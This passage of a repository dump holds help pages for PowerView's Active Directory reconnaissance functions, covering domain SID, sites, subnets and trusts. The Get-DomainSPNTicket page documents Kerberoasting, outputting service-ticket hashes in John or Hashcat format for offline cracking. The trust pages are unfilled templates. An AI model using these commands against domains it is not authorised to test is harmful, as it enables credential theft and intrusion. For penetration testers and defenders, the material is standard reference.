    "content": "# Get-DomainSID\r\n\r\n## SYNOPSIS\r\nReturns the SID for the current domain or the specified domain.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainSID [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nReturns the SID for the current domain or the specified domain by executing\r\nGet-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)\r\nto search for domain controllers through LDAP.\r\nThe SID of the returned domain controller\r\nis then extracted.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainSID\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainSID -Domain testlab.local\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainSID -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### String\r\n\r\nA string representing the specified domain SID.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainSPNTicket.md",
    "content": "# Get-DomainSPNTicket\r\n\r\n## SYNOPSIS\r\nRequest the kerberos ticket for a specified service principal name (SPN).\r\n\r\nAuthor: machosec, Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n### RawSPN (Default)\r\n```\r\nGet-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n### User\r\n```\r\nGet-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will either take one/more SPN strings, or one/more PowerView.User objects\r\n(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN\r\nusing System.IdentityModel.Tokens.KerberosRequestorSecurityToken.\r\nThe encrypted\r\nportion of the ticket is then extracted and output in either crackable John or Hashcat\r\nformat (deafult of John).\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainSPNTicket -SPN \"HTTP/web.testlab.local\"\r\n```\r\n\r\nRequest a kerberos service ticket for the specified SPN.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n\"HTTP/web1.testlab.local\",\"HTTP/web2.testlab.local\" | Get-DomainSPNTicket\r\n```\r\n\r\nRequest kerberos service tickets for all SPNs passed on the pipeline.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat\r\n```\r\n\r\nRequest kerberos service tickets for all users with non-null SPNs and output in Hashcat format.\r\n\r\n## PARAMETERS\r\n\r\n### -SPN\r\nSpecifies the service principal name to request the ticket for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: RawSPN\r\nAliases: ServicePrincipalName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -User\r\nSpecifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.\r\n\r\n```yaml\r\nType: Object[]\r\nParameter Sets: User\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OutputFormat\r\nEither 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.\r\nDefaults to 'John'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Format\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: John\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote domain using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nAccepts one or more SPN strings on the pipeline with the RawSPN parameter set.\r\n\r\n### PowerView.User\r\n\r\nAccepts one or more PowerView.User objects on the pipeline with the User parameter set.\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.SPNTicket\r\n\r\nOutputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainSite.md",
    "content": "# Get-DomainSite\r\n\r\n## SYNOPSIS\r\nSearch for all sites or specific site objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainSite [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]\r\n [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]\r\n [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties whencreated,usnchanged,...\".\r\nBy default, all site objects for\r\nthe current domain are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainSite\r\n```\r\n\r\nReturns the current sites in the domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainSite *admin* -Domain testlab.local\r\n```\r\n\r\nReturns all sites with \"admin\" in their name in the testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainSite -GPLink \"F260B76D-55C8-46C5-BEF1-9016DD98E272\"\r\n```\r\n\r\nReturns all sites with linked to the specified group policy object.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainSite -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nAn site name (e.g.\r\nTest-Site), DistinguishedName (e.g.\r\nCN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or\r\nGUID (e.g.\r\nc37726ef-2b64-4524-b85b-6a9700c234dd).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -GPLink\r\nOnly return sites with the specified GUID in their gplink property.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: GUID\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.Site\r\n\r\nCustom PSObject with translated site property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainSubnet.md",
    "content": "# Get-DomainSubnet\r\n\r\n## SYNOPSIS\r\nSearch for all subnets or specific subnets objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainSubnet [[-Identity] <String[]>] [-SiteName <String>] [-Domain <String>] [-LDAPFilter <String>]\r\n [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]\r\n [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties whencreated,usnchanged,...\".\r\nBy default, all subnet objects for\r\nthe current domain are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainSubnet\r\n```\r\n\r\nReturns the current subnets in the domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainSubnet *admin* -Domain testlab.local\r\n```\r\n\r\nReturns all subnets with \"admin\" in their name in the testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainSubnet -GPLink \"F260B76D-55C8-46C5-BEF1-9016DD98E272\"\r\n```\r\n\r\nReturns all subnets with linked to the specified group policy object.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainSubnet -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nAn subnet name (e.g.\r\n'192.168.50.0/24'), DistinguishedName (e.g.\r\n'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),\r\nor GUID (e.g.\r\nc37726ef-2b64-4524-b85b-6a9700c234dd).\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SiteName\r\nOnly return subnets from the specified SiteName.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.Subnet\r\n\r\nCustom PSObject with translated subnet property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainTrust.md",
    "content": "# Get-DomainTrust\r\n\r\n## SYNOPSIS\r\n{{Fill in the Synopsis}}\r\n\r\n## SYNTAX\r\n\r\n### NET (Default)\r\n```\r\nGet-DomainTrust [[-Domain] <String>] [-FindOne]\r\n```\r\n\r\n### API\r\n```\r\nGet-DomainTrust [[-Domain] <String>] [-API] [-Server <String>] [-FindOne]\r\n```\r\n\r\n### LDAP\r\n```\r\nGet-DomainTrust [[-Domain] <String>] [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### Example 1\r\n```\r\nPS C:\\> {{ Add example code here }}\r\n```\r\n\r\n{{ Add example description here }}\r\n\r\n## PARAMETERS\r\n\r\n### -API\r\n{{Fill API Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: API\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\n{{Fill Credential Description}}\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\n{{Fill Domain Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Name\r\n\r\nRequired: False\r\nPosition: 0\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\n{{Fill FindOne Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAP\r\n{{Fill LDAP Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\n{{Fill LDAPFilter Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: LDAP\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\n{{Fill Properties Description}}\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\n{{Fill ResultPageSize Description}}\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\n{{Fill SearchBase Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: LDAP\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\n{{Fill SearchScope Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: LDAP\r\nAliases: \r\nAccepted values: Base, OneLevel, Subtree\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\n{{Fill Server Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: API, LDAP\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\n{{Fill ServerTimeLimit Description}}\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\n{{Fill Tombstone Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### System.String\r\n\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.DomainTrust.NET\r\nPowerView.DomainTrust.LDAP\r\nPowerView.DomainTrust.API\r\n\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainTrustMapping.md",
    "content": "# Get-DomainTrustMapping\r\n\r\n## SYNOPSIS\r\n{{Fill in the Synopsis}}\r\n\r\n## SYNTAX\r\n\r\n### NET (Default)\r\n```\r\nGet-DomainTrustMapping\r\n```\r\n\r\n### API\r\n```\r\nGet-DomainTrustMapping [-API] [-Server <String>]\r\n```\r\n\r\n### LDAP\r\n```\r\nGet-DomainTrustMapping [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>]\r\n [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]\r\n [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### Example 1\r\n```\r\nPS C:\\> {{ Add example code here }}\r\n```\r\n\r\n{{ Add example description here }}\r\n\r\n## PARAMETERS\r\n\r\n### -API\r\n{{Fill API Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: API\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\n{{Fill Credential Description}}\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAP\r\n{{Fill LDAP Description}}\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\n{{Fill LDAPFilter Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: LDAP\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\n{{Fill Properties Description}}\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\n{{Fill ResultPageSize Description}}\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\n{{Fill SearchBase Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: LDAP\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\n{{Fill SearchScope Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: LDAP\r\nAliases: \r\nAccepted values: Base, OneLevel, Subtree\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\n{{Fill Server Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: API, LDAP\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\n{{Fill ServerTimeLimit Description}}\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: LDAP\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\n{{Fill Tombstone 